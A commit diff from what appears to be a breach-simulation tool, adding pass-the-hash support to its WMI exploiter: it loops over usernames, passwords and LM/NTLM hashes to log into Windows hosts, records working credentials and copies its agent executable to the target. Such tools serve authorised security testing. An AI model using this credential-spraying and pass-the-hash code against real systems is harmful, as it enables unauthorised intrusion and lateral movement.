Add pass-the-hash for wmi

2017-09-27 18:30:44 +03:00 · 2017-09-27 18:30:44 +03:00 · d628a27595
parent 7e3f420fe0
commit d628a27595
1 changed files with 23 additions and 19 deletions
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@ -29,34 +29,36 @@ class WmiExploiter(HostExploiter):
            LOG.info("Can't find suitable monkey executable for host %r", host)
            return False

-        user_password_pairs = self._config.get_exploit_user_password_pairs()
+        creds = self._config.get_exploit_user_password_or_hash_product()

-        for user, password in user_password_pairs:
-            LOG.debug("Attempting to connect %r using WMI with password '%s'",
-                      host, password)
+        for user, password, lm_hash, ntlm_hash in creds:
+            LOG.debug("Attempting to connect %r using WMI with user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
+                      host, user, password, lm_hash, ntlm_hash)

            wmi_connection = WmiTools.WmiConnection()

            try:
-                wmi_connection.connect(host,
-                                       user,
-                                       password)
+                wmi_connection.connect(host, user, password, None, lm_hash, ntlm_hash)
            except AccessDeniedException:
-                LOG.debug("Failed connecting to %r using WMI with user,password ('%s','%s')",
-                          host, user, password)
+                LOG.debug("Failed connecting to %r using WMI with "
+                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
+                          host, user, password, lm_hash, ntlm_hash)
                continue
-            except DCERPCException, exc:
-                report_failed_login(self, host, user, password)
-                LOG.debug("Failed connecting to %r using WMI with user,password: ('%s','%s')",
-                          host, user, password)
+            except DCERPCException as exc:
+                report_failed_login(self, host, user, password, lm_hash, ntlm_hash)
+                LOG.debug("Failed connecting to %r using WMI with "
+                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
+                          host, user, password, lm_hash, ntlm_hash)
                continue
-            except socket.error, exc:
-                LOG.debug("Network error in WMI connection to %r with user,password: ('%s','%s') (%s)",
-                          host, user, password, exc)
+            except socket.error as exc:
+                LOG.debug("Network error in WMI connection to %r with "
+                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s')",
+                          host, user, password, lm_hash, ntlm_hash)
                return False
-            except Exception, exc:
-                LOG.debug("Unknown WMI connection error to %r with user,password: ('%s','%s') (%s):\n%s",
-                          host, user, password, exc, traceback.format_exc())
+            except Exception as exc:
+                LOG.debug("Unknown WMI connection error to %r with "
+                          "user,password,lm hash,ntlm hash: ('%s','%s','%s','%s') (%s):\n%s",
+                          host, user, password, lm_hash, ntlm_hash, exc, traceback.format_exc())
                return False

            host.learn_credentials(user, password)
@ -77,6 +79,8 @@ class WmiExploiter(HostExploiter):
                                                  self._config.dropper_target_path,
                                                  user,
                                                  password,
+                                                  lm_hash,
+                                                  ntlm_hash,
                                                  self._config.smb_download_timeout)

            if not remote_full_path: